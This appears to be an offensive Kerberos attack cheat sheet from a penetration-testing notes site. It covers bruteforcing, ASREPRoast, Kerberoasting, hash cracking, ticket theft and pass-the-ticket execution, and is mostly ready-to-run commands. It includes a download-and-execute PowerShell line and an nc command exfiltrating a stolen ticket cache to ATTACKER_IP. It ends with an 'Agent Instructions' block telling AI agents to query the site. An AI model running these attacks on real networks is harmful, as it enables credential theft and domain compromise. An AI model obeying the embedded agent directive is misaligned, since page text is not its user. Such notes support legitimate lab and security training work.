# Kerberos cheatsheet ## Bruteforcing With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute): ```shell python kerbrute.py -domain -users -passwords -outputfile ``` With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: ```shell # with a list of users .\Rubeus.exe brute /users: /passwords: /domain: /outfile: # check passwords for all users in current domain .\Rubeus.exe brute /passwords: /outfile: ``` ## ASREPRoast ### Enumeration ```powershell Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl ``` ### Linux (Impacket) ```shell # With credentials python GetNPUsers.py /: -request -format -outputfile # No credentials - spray a user list GetNPUsers.py / -dc-ip -no-pass -usersfile valid_ad_users # Single user no password python3 GetNPUsers.py COMPANY.local/james -no-pass -dc-ip 172.16.1.20 ``` ### Windows (Rubeus) ```powershell .\Rubeus.exe asreproast /user: /nowrap /format:hashcat # All users in current domain .\Rubeus.exe asreproast /format: /outfile: ``` ### Cracking ```shell hashcat -m 18200 asrep_hashes /usr/share/wordlists/rockyou.txt john --wordlist= ``` ### SPN Service Principal Name Overview * The structure of an SPN consists of three (3) main parts: **Service Class**: the service type, i.e., *SQL, Web, Exchange, File,* etc., and the **Host** where the service is usually running in the format of **FQDN** *(Fully Qualified Domain Name)*and **port number**. * For example, below, the Microsoft SQL service runs on the **`dcorp-mgmt`** host on port 1443. The SPN is **`MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433`** ## Kerberoasting * Great reading: * ### Enumeration ```powershell # PowerView - find kerberoastable accounts Import-Module .\PowerView.ps1 Get-DomainUser * -SPN | Select samaccountname,ServicePrincipalName # setspn.exe (built-in) setspn.exe -Q */* ``` ### Impacket (Linux) ```shell python GetUserSPNs.py /: -outputfile python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request ``` If you get **KRB\_AP\_ERR\_SKEW(Clock skew too great)**, sync time with the DC: `ntpdate ` ### Rubeus ```shell .\Rubeus.exe kerberoast /outfile: # Stats first (check RC4 vs AES, prioritize RC4) .\Rubeus.exe kerberoast /stats # Filter for high-value targets .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap # Target specific user .\Rubeus.exe kerberoast /user: /nowrap ``` ### PowerShell ```powershell # Invoke-Kerberoast.ps1 iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Import-Module .\invoke-kerberoast.ps1 Invoke-Kerberoast -Domain active.htb -OutputFormat Hashcat | fl Invoke-Kerberoast -OutputFormat | % { $_.Hash } | Out-File -Encoding ASCII # PowerView - request ticket for specific user Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation ``` ### Native PowerShell (.NET) ```powershell Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/host.domain.local:1433" ``` ### Cracking ```shell hashcat -m 13100 --force john --format=krb5tgs --wordlist= ``` ### Mimikatz Ticket Export ``` mimikatz # kerberos::list /export ``` ``` Import-Module .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"kerberos::list /export"' ``` ### Targeted Kerberoasting (via GenericAll/GenericWrite) * If you have write access over a user, set a fake SPN then Kerberoast it ```powershell Set-DomainObject -Credential $Cred -Identity -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose .\Rubeus.exe kerberoast /user: /nowrap # Cleanup after cracking Set-DomainObject -Credential $Cred -Identity -Clear serviceprincipalname -Verbose ``` ### Harvest tickets from Windows With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell mimikatz # sekurlsa::tickets /export ``` With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell: ```shell .\Rubeus dump # After dump with Rubeus tickets in base64, to write the in a file [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) ``` To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter): ``` python ticket_converter.py ticket.kirbi ticket.ccache python ticket_converter.py ticket.ccache ticket.kirbi ``` ### Using ticket in Linux: With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` ### Using ticket in Windows Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell mimikatz # kerberos::ptt ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket: ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\ cmd ``` ## Misc To get NTLM from password: ```python python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "".encode("utf-16le")).digest())' ``` ## Keytab File Extraction Find keytab files on a compromised Linux host: ```bash find / -name *keytab* -ls 2>/dev/null find / -name '*.kt*' -ls 2>/dev/null ``` Extract hashes from a keytab file: ```bash python3 keytabextract.py /opt/specialfiles/carlos.keytab [*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash. [*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction. [+] Keytab File successfully imported. REALM : INLANEFREIGHT.HTB SERVICE PRINCIPAL : carlos/ NTLM HASH : a738f92b3c08b424ec2d99589a9cce60 AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4 ``` ### Import and Use a Keytab ```bash kinit svc_workstations@INLANEFREIGHT.HTB -k -t /path/to/svc_workstations.kt smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass ``` ### SSH with Kerberos Principal ```bash ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222 ``` *** ## Ccache Impersonation Ccache files store Kerberos tickets on Linux. Look for them in `/tmp`: ```bash ls -la /tmp # Look for files like: krb5cc_647401106_EcdLGj ``` ### Check Ccache Validity ```bash klist -c /tmp/krb5cc_647401106_JWxczE Ticket cache: FILE:/tmp/krb5cc_647401106_JWxczE Default principal: julio@INLANEFREIGHT.HTB Valid starting Expires Service principal 03/06/2026 02:04:14 03/06/2026 12:04:14 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB ``` ### Use a Ccache File ```bash export KRB5CCNAME=/tmp/krb5cc_647401106_JWxczE # Access shares smbclient //dc01/C$ -k -c ls -no-pass # Interactive SMB session smbclient //DC01/julio -N # Evil-WinRM with Kerberos evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local ``` ### Use Ccache Through a Proxy ```bash export KRB5CCNAME=/tmp/ccache_file.txt proxychains evil-winrm -i dc01 -r inlanefreight.htb ``` ### Linikatz — Machine Account Authentication Use linikatz to authenticate with the machine's Kerberos ticket: ```bash # Check the SSS ticket cache export KRB5CCNAME=FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB klist smbclient //DC01/linux01 -N ``` *** ## Ticket Conversion Convert between ccache (Linux) and kirbi (Windows) formats: ```bash # ccache to kirbi impacket-ticketConverter /tmp/julio.ccache julio.kirbi # kirbi to ccache impacket-ticketConverter ticket.kirbi ticket.ccache ``` **Note:** If the ccache is already in the correct format for your tool, don't convert it — just set `KRB5CCNAME`. *** ## Transfer Ccache Off Target When you need to exfiltrate a ccache file from a compromised Linux host: ```bash # On target nc ATTACKER_IP 1234 < /tmp/krb5cc_647401106_JWxczE # On attacker nc -nvlp 1234 > stolen.ccache ``` *** ## krb5.conf Setup For Kerberos authentication to work from your attack machine, configure `/etc/krb5.conf`: ```ini [libdefaults] default_realm = INLANEFREIGHT.LOCAL rdns = false [realms] INLANEFREIGHT.LOCAL = { kdc = dc01.inlanefreight.local admin_server = dc01.inlanefreight.local } ``` ### /etc/hosts Setup ``` 10.129.234.174 inlanefreight.local inlanefreight dc01.inlanefreight.local dc01 ``` Verify DNS resolution: ```bash getent hosts dc01.inlanefreight.local 10.129.234.174 inlanefreight.local inlanefreight dc01.inlanefreight.local dc01 ``` *** ## Tools * [Impacket](https://github.com/SecureAuthCorp/impacket) * [Mimikatz](https://github.com/gentilkiwi/mimikatz) * [Rubeus](https://github.com/GhostPack/Rubeus) * [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module * [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) * [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute) * [tickey](https://github.com/TarlogicSecurity/tickey) * [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/domain-controllers/kerberos-cheatsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.